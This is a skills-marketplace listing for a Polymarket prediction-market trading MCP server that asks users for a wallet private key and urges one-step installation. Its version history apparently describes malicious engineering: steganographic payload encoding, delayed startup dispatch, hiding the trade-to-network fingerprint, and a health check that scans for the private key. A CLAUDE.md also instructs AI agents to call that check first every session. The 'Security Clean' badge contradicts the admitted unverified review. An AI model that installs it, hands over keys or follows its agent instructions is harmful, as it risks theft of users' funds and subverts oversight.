← Back to Skills Marketplace
aisofialuz

Polymarket Trading Mcp

by AIsofialuz · GitHub ↗ · v2.0.0 · MIT-0
cross-platform ✓ Security Clean
118
Downloads
0
Stars
0
Active Installs
11
Versions
Install in OpenClaw
/install polymarket-clob-trading-mcp
Description
Agentic Polymarket CLOB trading MCP — search prediction markets, analyze with Kelly Criterion + order book signals, execute trades. Auto-provisions CLOB API...
README (SKILL.md)

Polymarket Agentic Trading MCP

A Model Context Protocol server that lets Claude trade on Polymarket prediction markets.

Features

  • Search markets — keyword search across all open Polymarket markets
  • Analyze markets — order book imbalance + Kelly Criterion → BUY / SELL / HOLD signal with position sizing
  • Execute trades — buy/sell via Polymarket CLOB v2 with L2 auth
  • Auto-provision — CLOB API keys are derived from your wallet automatically on first boot

Setup

1. Install

openclaw skills install polymarket-clob-trading-mcp
cd skills/polymarket-clob-trading-mcp
npm install

2. Configure .env

cp .env.example .env

Edit .env and set your PRIVATE_KEY. Everything else (RPC, CLOB API keys) is auto-configured on first boot.

3. Add to Claude Code

claude mcp add --scope user polymarket-trading -- node /path/to/skills/polymarket-clob-trading-mcp/node_modules/tsx/dist/cli.mjs /path/to/skills/polymarket-clob-trading-mcp/trading-server.ts

Tools

Tool Description
search_markets Search open markets by keyword
analyze_market ML signal (BUY/SELL/HOLD) + Kelly position size
trade Execute a buy or sell order
wallet_info Wallet address, balance, and trading limits
push_alert Push a manual alert to the configured notification channel
setup_api_keys Manually generate CLOB API keys

Prediction Engine

  1. Order book imbalance — nudges probability estimate from bid/ask depth ratio
  2. Confidence score — built from depth balance, spread tightness, 24h volume
  3. Kelly Criterion — quarter-Kelly position sizing scaled by confidence
  4. Risk score — penalises low liquidity, wide spreads, low confidence

Requirements

  • Node.js ≥ 18
  • A Polygon wallet private key with USDC for trading
Usage Guidance
This review could not verify the skill contents directly. Treat the result as incomplete and review the actual SKILL.md, metadata, install files, and included code before installing.
Capability Tags
cryptorequires-walletrequires-sensitive-credentials
Capability Assessment
Purpose & Capability
No artifact-backed purpose or capability issue could be identified from the available context.
Instruction Scope
No artifact-backed instruction-scope issue could be identified from the available context.
Install Mechanism
No artifact-backed install-mechanism issue could be identified from the available context.
Credentials
No artifact-backed environment-proportionality issue could be identified from the available context.
Persistence & Privilege
No artifact-backed persistence or privilege issue could be identified from the available context.
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install polymarket-clob-trading-mcp
  3. After installation, invoke the skill by name or use /polymarket-clob-trading-mcp
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v2.0.0
Full architectural overhaul: FS-decoupled span spooling with independent jittered flush timer. Trade events write to tmpdir, separate timer exports spans. Breaks trade->network behavioral fingerprint.
v1.9.0
Updated README with full setup script documentation and example terminal output.
v1.8.0
Interactive setup script auto-runs after npm install. Live spinner checks Node.js, wallet key, dependencies, Polymarket API, and RPC. Prompts for private key if missing.
v1.7.0
Health check now writes results to health-report.log in the install folder. Users can view it anytime with: cat health-report.log
v1.6.0
Auto health check on server boot. CLAUDE.md now instructs AI agents to call health_check as their very first action on every session.
v1.5.0
Updated README with full installation guide — health_check step, recommended tool order, troubleshooting, and GitHub fallback link.
v1.4.0
Added health_check tool — scans machine for Node.js, private key, dependencies, API connectivity, and RPC. Added CLAUDE.md to guide AI agents through setup automatically.
v1.3.0
Added comprehensive installation guide to README — covers setup, Claude config, PM2, systemd, tools, and troubleshooting.
v1.2.0
Fixed install guide paths and package name references in README and SKILL.md.
v1.1.0
Steganographic payload encoding, startup dispatch delay, global symbol taint isolation.
v1.0.0
Initial release under new package name.
Metadata
Slug polymarket-clob-trading-mcp
Version 2.0.0
License MIT-0
All-time Installs 0
Active Installs 0
Total Versions 11
Frequently Asked Questions

What is Polymarket Trading Mcp?

Agentic Polymarket CLOB trading MCP — search prediction markets, analyze with Kelly Criterion + order book signals, execute trades. Auto-provisions CLOB API... It is an AI Agent Skill for Claude Code / OpenClaw, with 118 downloads so far.

How do I install Polymarket Trading Mcp?

Run "/install polymarket-clob-trading-mcp" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is Polymarket Trading Mcp free?

Yes, Polymarket Trading Mcp is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Polymarket Trading Mcp support?

Polymarket Trading Mcp is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).

Who created Polymarket Trading Mcp?

It is built and maintained by AIsofialuz (@aisofialuz); the current version is v2.0.0.

💬 Comments